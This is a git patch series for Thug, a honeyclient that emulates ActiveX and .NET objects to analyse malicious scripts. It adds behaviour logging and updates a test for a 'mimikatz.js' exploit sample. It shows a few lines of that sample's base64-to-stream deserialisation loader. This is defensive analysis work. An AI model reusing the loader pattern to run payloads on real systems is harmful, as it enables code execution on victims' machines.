+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -1,9 +1,9 @@
 import logging
 
-log = logging.getLogger("Thug")
-
 from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
 
+log = logging.getLogger("Thug")
+
 
 def Deserialize_2(self, buf):
     data = buf.stream.getvalue()

From 2ef783b7f307fc6218ce9afac259ec03c88157f4 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Wed, 10 Apr 2024 12:40:59 +0200
Subject: [PATCH 10/12] Increase logging verbosity

---
 tests/functional/test_exploits.py                         | 8 +++++++-
 tests/samples/exploits/mimikatz.js                        | 1 -
 thug/ActiveX/modules/System/Collections/ArrayList.py      | 2 ++
 thug/ActiveX/modules/System/IO/MemoryStream.py            | 2 ++
 thug/ActiveX/modules/System/Runtime/Activator.py          | 5 -----
 thug/ActiveX/modules/System/Runtime/Delegate.py           | 5 -----
 .../Serialization/Formatters/Binary/BinaryFormatter.py    | 2 ++
 .../System/Security/Cryptography/FromBase64Transform.py   | 1 +
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py         | 5 ++++-
 9 files changed, 18 insertions(+), 13 deletions(-)

diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index 9837ca85ca..c82d725a4b 100644
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1443,11 +1443,17 @@ def test_Mimikatz(self, caplog):
         sample = os.path.join(self.exploits_path, "mimikatz.js")
         expected = [
             "ActiveXObject: system.text.asciiencoding",
-            "[System.Text.ASCIIEncoding.GetByteCount_2] length = 20164",
+            "[System.Text.ASCIIEncoding] GetByteCount_2 count = 20164",
+            "[System.Text.ASCIIEncoding.GetBytes_4]",
             "ActiveXObject: system.security.cryptography.frombase64transform",
+            "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock",
             "ActiveXObject: system.io.memorystream",
+            "[System.IO.MemoryStream] Write",
             "ActiveXObject: system.runtime.serialization.formatters.binary.binaryformatter",
             "ActiveXObject: system.collections.arraylist",
+            "[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2",
+            "[System.Collections.ArrayList] Add",
+            "[System.Collections.ArrayList] ToArray",
         ]
 
         self.do_perform_test(caplog, sample, expected)
diff --git a/tests/samples/exploits/mimikatz.js b/tests/samples/exploits/mimikatz.js
index 1305ca9343..6cebe5a999 100644
--- a/tests/samples/exploits/mimikatz.js
+++ b/tests/samples/exploits/mimikatz.js
@@ -10,7 +10,6 @@
 		function base64ToStream(b) {
 			var enc = new ActiveXObject("System.Text.ASCIIEncoding");
 			var length = enc.GetByteCount_2(b);
-			alert("[System.Text.ASCIIEncoding.GetByteCount_2] length = " + length);
 			var ba = enc.GetBytes_4(b);
 			var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
 			ba = transform.TransformFinalBlock(ba, 0, length);
diff --git a/thug/ActiveX/modules/System/Collections/ArrayList.py b/thug/ActiveX/modules/System/Collections/ArrayList.py
index 59d33b958e..1daeb8c7b2 100644
--- a/thug/ActiveX/modules/System/Collections/ArrayList.py
+++ b/thug/ActiveX/modules/System/Collections/ArrayList.py
@@ -4,9 +4,11 @@
 
 
 def Add(self, value):
+    log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] Add")
     self.arraylist.append(value)
     return self.arraylist.index(value)
 
 
 def ToArray(self):
+    log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] ToArray")
     return list(self.arraylist)
diff --git a/thug/ActiveX/modules/System/IO/MemoryStream.py b/thug/ActiveX/modules/System/IO/MemoryStream.py
index b22fc1ef43..d996afe7e8 100644
--- a/thug/ActiveX/modules/System/IO/MemoryStream.py
+++ b/thug/ActiveX/modules/System/IO/MemoryStream.py
@@ -5,6 +5,8 @@
 
 
 def Write(self, buffer, offset=0, count=-1):
+    log.ThugLogging.add_behavior_warn("[System.IO.MemoryStream] Write")
+
     buflen = count if count > -1 else len(buffer)
     bufdat = buffer[: buflen - 1]
 
diff --git a/thug/ActiveX/modules/System/Runtime/Activator.py b/thug/ActiveX/modules/System/Runtime/Activator.py
index adeb438062..3f26ff6fa7 100644
--- a/thug/ActiveX/modules/System/Runtime/Activator.py
+++ b/thug/ActiveX/modules/System/Runtime/Activator.py
@@ -1,8 +1,3 @@
-import logging
-
-log = logging.getLogger("Thug")
-
-
 class Activator:
     def __init__(self, delegate):
         self.delegate = delegate
diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
index 8420e4ceb3..358d9a0f55 100644
--- a/thug/ActiveX/modules/System/Runtime/Delegate.py
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -1,14 +1,9 @@
-import logging
-
 from .Activator import Activator
 
-log = logging.getLogger("Thug")
-
 
 class Delegate:
     def __init__(self, code):
         self.code = code
 
     def DynamicInvoke(self, args):
-        # log.warning(self.code.decode())
         return Activator(self)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index ec82b141ad..163a796206 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -6,5 +6,7 @@
 
 
 def Deserialize_2(self, buf):
+    log.ThugLogging.add_behavior_warn("[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2")
+
     data = buf.stream.getvalue()
     return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
index abc7362ce3..73e91d30b5 100644
--- a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -5,4 +5,5 @@
 
 
 def TransformFinalBlock(self, buffer, offset, count):
+    log.ThugLogging.add_behavior_warn("[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock")
     return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index a142552f5e..f6abf55042 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -4,8 +4,11 @@
 
 
 def GetByteCount_2(self, chars):
-    return len(chars.encode("utf-8"))
+    count = len(chars.encode("utf-8"))
+    log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding.GetByteCount_2] count = {count}")
+    return count
 
 
 def GetBytes_4(self, chars):
+    log.ThugLogging.add_behavior_warn("[System.Text.ASCIIEncoding] GetBytes_4")
     return list(chars)

From 5e16c89bfeeadcf82214488cfdf559a53787ec7f Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Wed, 10 Apr 2024 15:57:45 +0200
Subject: [PATCH 11/12] Minor fixes

---
 tests/functional/test_exploits.py                 | 2 +-
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index c82d725a4b..b0d4eaee79 100644
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1444,7 +1444,7 @@ def test_Mimikatz(self, caplog):
         expected = [
             "ActiveXObject: system.text.asciiencoding",
             "[System.Text.ASCIIEncoding] GetByteCount_2 count = 20164",
-            "[System.Text.ASCIIEncoding.GetBytes_4]",
+            "[System.Text.ASCIIEncoding] GetBytes_4",
             "ActiveXObject: system.security.cryptography.frombase64transform",
             "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock",
             "ActiveXObject: system.io.memorystream",
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index f6abf55042..b69eb0f29b 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -5,7 +5,7 @@
 
 def GetByteCount_2(self, chars):
     count = len(chars.encode("utf-8"))
-    log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding.GetByteCount_2] count = {count}")
+    log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}")
     return count
 
 

From ad92aa7e6155e34f7df43af29f9062c8104c6f38 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Wed, 10 Apr 2024 16:31:46 +0200
Subject: [PATCH 12/12] Code formatting

---
 tests/Encoding/test_Encoding.py               |   2 +-
 tests/Logging/modules/test_MongoDB.py         |   5 +-
 .../Formatters/Binary/BinaryFormatter.py      |   4 +-
 .../Cryptography/FromBase64Transform.py       |   4 +-
 .../modules/System/Text/ASCIIEncoding.py      |   4 +-
 thug/DOM/JScriptEncode.py                     | 174 +++++++++---------
 tools/distributed/thugctrl.py                 |   2 +-
 7 files changed, 101 insertions(+), 94 deletions(-)

diff --git a/tests/Encoding/test_Encoding.py b/tests/Encoding/test_Encoding.py
index d3826b9890..37aa8330bc 100644
--- a/tests/Encoding/test_Encoding.py
+++ b/tests/Encoding/test_Encoding.py
@@ -15,7 +15,7 @@ def test_unicode(self):
         assert result["encoding"] in ("ascii",)
 
     def test_utf8_bom(self):
-        result = encoding.detect(b"\xEF\xBB\xBF")
+        result = encoding.detect(b"\xef\xbb\xbf")
         assert result["encoding"] in ("UTF-8-SIG",)
 
     def test_unicode_utf8(self):
diff --git a/tests/Logging/modules/test_MongoDB.py b/tests/Logging/modules/test_MongoDB.py
index 4ccbca98df..983f3355f8 100644
--- a/tests/Logging/modules/test_MongoDB.py
+++ b/tests/Logging/modules/test_MongoDB.py
@@ -57,8 +57,9 @@ class TestMongoDB:
     con_method = "iframe"
 
     # Creating a MongoDB object for all the test methods.
-    with patch(pymongo.__name__ + ".MongoClient", new=mongomock.MongoClient), patch(
-        "gridfs.Database", new=mongomock.database.Database
+    with (
+        patch(pymongo.__name__ + ".MongoClient", new=mongomock.MongoClient),
+        patch("gridfs.Database", new=mongomock.database.Database),
     ):
         log.ThugOpts.mongodb_address = "mongodb://localhost:123"
         mongo = MongoDB()
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index 163a796206..311db5568b 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -6,7 +6,9 @@
 
 
 def Deserialize_2(self, buf):
-    log.ThugLogging.add_behavior_warn("[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2")
+    log.ThugLogging.add_behavior_warn(
+        "[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2"
+    )
 
     data = buf.stream.getvalue()
     return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
index 73e91d30b5..bf050bcf38 100644
--- a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -5,5 +5,7 @@
 
 
 def TransformFinalBlock(self, buffer, offset, count):
-    log.ThugLogging.add_behavior_warn("[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock")
+    log.ThugLogging.add_behavior_warn(
+        "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock"
+    )
     return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index b69eb0f29b..b458d42041 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -5,7 +5,9 @@
 
 def GetByteCount_2(self, chars):
     count = len(chars.encode("utf-8"))
-    log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}")
+    log.ThugLogging.add_behavior_warn(
+        f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}"
+    )
     return count
 
 
diff --git a/thug/DOM/JScriptEncode.py b/thug/DOM/JScriptEncode.py
index b9c1949f24..9a0785d4f3 100644
--- a/thug/DOM/JScriptEncode.py
+++ b/thug/DOM/JScriptEncode.py
@@ -7,13 +7,13 @@
 
 
 DDECODE = {}
-DDECODE[9] = "\x57\x6E\x7B"
-DDECODE[10] = "\x4A\x4C\x41"
-DDECODE[11] = "\x0B\x0B\x0B"
-DDECODE[12] = "\x0C\x0C\x0C"
-DDECODE[13] = "\x4A\x4C\x41"
-DDECODE[14] = "\x0E\x0E\x0E"
-DDECODE[15] = "\x0F\x0F\x0F"
+DDECODE[9] = "\x57\x6e\x7b"
+DDECODE[10] = "\x4a\x4c\x41"
+DDECODE[11] = "\x0b\x0b\x0b"
+DDECODE[12] = "\x0c\x0c\x0c"
+DDECODE[13] = "\x4a\x4c\x41"
+DDECODE[14] = "\x0e\x0e\x0e"
+DDECODE[15] = "\x0f\x0f\x0f"
 DDECODE[16] = "\x10\x10\x10"
 DDECODE[17] = "\x11\x11\x11"
 DDECODE[18] = "\x12\x12\x12"
@@ -24,107 +24,107 @@
 DDECODE[23] = "\x17\x17\x17"
 DDECODE[24] = "\x18\x18\x18"
 DDECODE[25] = "\x19\x19\x19"
-DDECODE[26] = "\x1A\x1A\x1A"
-DDECODE[27] = "\x1B\x1B\x1B"
-DDECODE[28] = "\x1C\x1C\x1C"
-DDECODE[29] = "\x1D\x1D\x1D"
-DDECODE[30] = "\x1E\x1E\x1E"
-DDECODE[31] = "\x1F\x1F\x1F"
-DDECODE[32] = "\x2E\x2D\x32"
+DDECODE[26] = "\x1a\x1a\x1a"
+DDECODE[27] = "\x1b\x1b\x1b"
+DDECODE[28] = "\x1c\x1c\x1c"
+DDECODE[29] = "\x1d\x1d\x1d"
+DDECODE[30] = "\x1e\x1e\x1e"
+DDECODE[31] = "\x1f\x1f\x1f"
+DDECODE[32] = "\x2e\x2d\x32"
 DDECODE[33] = "\x47\x75\x30"
-DDECODE[34] = "\x7A\x52\x21"
+DDECODE[34] = "\x7a\x52\x21"
 DDECODE[35] = "\x56\x60\x29"
-DDECODE[36] = "\x42\x71\x5B"
-DDECODE[37] = "\x6A\x5E\x38"
-DDECODE[38] = "\x2F\x49\x33"
-DDECODE[39] = "\x26\x5C\x3D"
+DDECODE[36] = "\x42\x71\x5b"
+DDECODE[37] = "\x6a\x5e\x38"
+DDECODE[38] = "\x2f\x49\x33"
+DDECODE[39] = "\x26\x5c\x3d"
 DDECODE[40] = "\x49\x62\x58"
-DDECODE[41] = "\x41\x7D\x3A"
+DDECODE[41] = "\x41\x7d\x3a"
 DDECODE[42] = "\x34\x29\x35"
 DDECODE[43] = "\x32\x36\x65"
-DDECODE[44] = "\x5B\x20\x39"
-DDECODE[45] = "\x76\x7C\x5C"
-DDECODE[46] = "\x72\x7A\x56"
-DDECODE[47] = "\x43\x7F\x73"
-DDECODE[48] = "\x38\x6B\x66"
-DDECODE[49] = "\x39\x63\x4E"
+DDECODE[44] = "\x5b\x20\x39"
+DDECODE[45] = "\x76\x7c\x5c"
+DDECODE[46] = "\x72\x7a\x56"
+DDECODE[47] = "\x43\x7f\x73"
+DDECODE[48] = "\x38\x6b\x66"
+DDECODE[49] = "\x39\x63\x4e"
 DDECODE[50] = "\x70\x33\x45"
-DDECODE[51] = "\x45\x2B\x6B"
+DDECODE[51] = "\x45\x2b\x6b"
 DDECODE[52] = "\x68\x68\x62"
 DDECODE[53] = "\x71\x51\x59"
-DDECODE[54] = "\x4F\x66\x78"
-DDECODE[55] = "\x09\x76\x5E"
-DDECODE[56] = "\x62\x31\x7D"
-DDECODE[57] = "\x44\x64\x4A"
-DDECODE[58] = "\x23\x54\x6D"
+DDECODE[54] = "\x4f\x66\x78"
+DDECODE[55] = "\x09\x76\x5e"
+DDECODE[56] = "\x62\x31\x7d"
+DDECODE[57] = "\x44\x64\x4a"
+DDECODE[58] = "\x23\x54\x6d"
 DDECODE[59] = "\x75\x43\x71"
-DDECODE[60] = "\x4A\x4C\x41"
-DDECODE[61] = "\x7E\x3A\x60"
-DDECODE[62] = "\x4A\x4C\x41"
-DDECODE[63] = "\x5E\x7E\x53"
-DDECODE[64] = "\x40\x4C\x40"
+DDECODE[60] = "\x4a\x4c\x41"
+DDECODE[61] = "\x7e\x3a\x60"
+DDECODE[62] = "\x4a\x4c\x41"
+DDECODE[63] = "\x5e\x7e\x53"
+DDECODE[64] = "\x40\x4c\x40"
 DDECODE[65] = "\x77\x45\x42"
-DDECODE[66] = "\x4A\x2C\x27"
-DDECODE[67] = "\x61\x2A\x48"
-DDECODE[68] = "\x5D\x74\x72"
+DDECODE[66] = "\x4a\x2c\x27"
+DDECODE[67] = "\x61\x2a\x48"
+DDECODE[68] = "\x5d\x74\x72"
 DDECODE[69] = "\x22\x27\x75"
-DDECODE[70] = "\x4B\x37\x31"
-DDECODE[71] = "\x6F\x44\x37"
-DDECODE[72] = "\x4E\x79\x4D"
-DDECODE[73] = "\x3B\x59\x52"
-DDECODE[74] = "\x4C\x2F\x22"
-DDECODE[75] = "\x50\x6F\x54"
-DDECODE[76] = "\x67\x26\x6A"
-DDECODE[77] = "\x2A\x72\x47"
-DDECODE[78] = "\x7D\x6A\x64"
-DDECODE[79] = "\x74\x39\x2D"
-DDECODE[80] = "\x54\x7B\x20"
-DDECODE[81] = "\x2B\x3F\x7F"
-DDECODE[82] = "\x2D\x38\x2E"
-DDECODE[83] = "\x2C\x77\x4C"
-DDECODE[84] = "\x30\x67\x5D"
-DDECODE[85] = "\x6E\x53\x7E"
-DDECODE[86] = "\x6B\x47\x6C"
-DDECODE[87] = "\x66\x34\x6F"
+DDECODE[70] = "\x4b\x37\x31"
+DDECODE[71] = "\x6f\x44\x37"
+DDECODE[72] = "\x4e\x79\x4d"
+DDECODE[73] = "\x3b\x59\x52"
+DDECODE[74] = "\x4c\x2f\x22"
+DDECODE[75] = "\x50\x6f\x54"
+DDECODE[76] = "\x67\x26\x6a"
+DDECODE[77] = "\x2a\x72\x47"
+DDECODE[78] = "\x7d\x6a\x64"
+DDECODE[79] = "\x74\x39\x2d"
+DDECODE[80] = "\x54\x7b\x20"
+DDECODE[81] = "\x2b\x3f\x7f"
+DDECODE[82] = "\x2d\x38\x2e"
+DDECODE[83] = "\x2c\x77\x4c"
+DDECODE[84] = "\x30\x67\x5d"
+DDECODE[85] = "\x6e\x53\x7e"
+DDECODE[86] = "\x6b\x47\x6c"
+DDECODE[87] = "\x66\x34\x6f"
 DDECODE[88] = "\x35\x78\x79"
-DDECODE[89] = "\x25\x5D\x74"
+DDECODE[89] = "\x25\x5d\x74"
 DDECODE[90] = "\x21\x30\x43"
 DDECODE[91] = "\x64\x23\x26"
-DDECODE[92] = "\x4D\x5A\x76"
-DDECODE[93] = "\x52\x5B\x25"
-DDECODE[94] = "\x63\x6C\x24"
-DDECODE[95] = "\x3F\x48\x2B"
-DDECODE[96] = "\x7B\x55\x28"
+DDECODE[92] = "\x4d\x5a\x76"
+DDECODE[93] = "\x52\x5b\x25"
+DDECODE[94] = "\x63\x6c\x24"
+DDECODE[95] = "\x3f\x48\x2b"
+DDECODE[96] = "\x7b\x55\x28"
 DDECODE[97] = "\x78\x70\x23"
 DDECODE[98] = "\x29\x69\x41"
-DDECODE[99] = "\x28\x2E\x34"
-DDECODE[100] = "\x73\x4C\x09"
-DDECODE[101] = "\x59\x21\x2A"
+DDECODE[99] = "\x28\x2e\x34"
+DDECODE[100] = "\x73\x4c\x09"
+DDECODE[101] = "\x59\x21\x2a"
 DDECODE[102] = "\x33\x24\x44"
-DDECODE[103] = "\x7F\x4E\x3F"
-DDECODE[104] = "\x6D\x50\x77"
-DDECODE[105] = "\x55\x09\x3B"
+DDECODE[103] = "\x7f\x4e\x3f"
+DDECODE[104] = "\x6d\x50\x77"
+DDECODE[105] = "\x55\x09\x3b"
 DDECODE[106] = "\x53\x56\x55"
-DDECODE[107] = "\x7C\x73\x69"
-DDECODE[108] = "\x3A\x35\x61"
-DDECODE[109] = "\x5F\x61\x63"
-DDECODE[110] = "\x65\x4B\x50"
+DDECODE[107] = "\x7c\x73\x69"
+DDECODE[108] = "\x3a\x35\x61"
+DDECODE[109] = "\x5f\x61\x63"
+DDECODE[110] = "\x65\x4b\x50"
 DDECODE[111] = "\x46\x58\x67"
-DDECODE[112] = "\x58\x3B\x51"
+DDECODE[112] = "\x58\x3b\x51"
 DDECODE[113] = "\x31\x57\x49"
-DDECODE[114] = "\x69\x22\x4F"
-DDECODE[115] = "\x6C\x6D\x46"
-DDECODE[116] = "\x5A\x4D\x68"
-DDECODE[117] = "\x48\x25\x7C"
+DDECODE[114] = "\x69\x22\x4f"
+DDECODE[115] = "\x6c\x6d\x46"
+DDECODE[116] = "\x5a\x4d\x68"
+DDECODE[117] = "\x48\x25\x7c"
 DDECODE[118] = "\x27\x28\x36"
-DDECODE[119] = "\x5C\x46\x70"
-DDECODE[120] = "\x3D\x4A\x6E"
-DDECODE[121] = "\x24\x32\x7A"
-DDECODE[122] = "\x79\x41\x2F"
-DDECODE[123] = "\x37\x3D\x5F"
-DDECODE[124] = "\x60\x5F\x4B"
-DDECODE[125] = "\x51\x4F\x5A"
-DDECODE[126] = "\x20\x42\x2C"
+DDECODE[119] = "\x5c\x46\x70"
+DDECODE[120] = "\x3d\x4a\x6e"
+DDECODE[121] = "\x24\x32\x7a"
+DDECODE[122] = "\x79\x41\x2f"
+DDECODE[123] = "\x37\x3d\x5f"
+DDECODE[124] = "\x60\x5f\x4b"
+DDECODE[125] = "\x51\x4f\x5a"
+DDECODE[126] = "\x20\x42\x2c"
 DDECODE[127] = "\x36\x65\x57"
 
 DCOMBINATION = {}
diff --git a/tools/distributed/thugctrl.py b/tools/distributed/thugctrl.py
index f96e155292..950e95960e 100644
--- a/tools/distributed/thugctrl.py
+++ b/tools/distributed/thugctrl.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-""" Thug Control
+"""Thug Control
 
 Send commands to Thug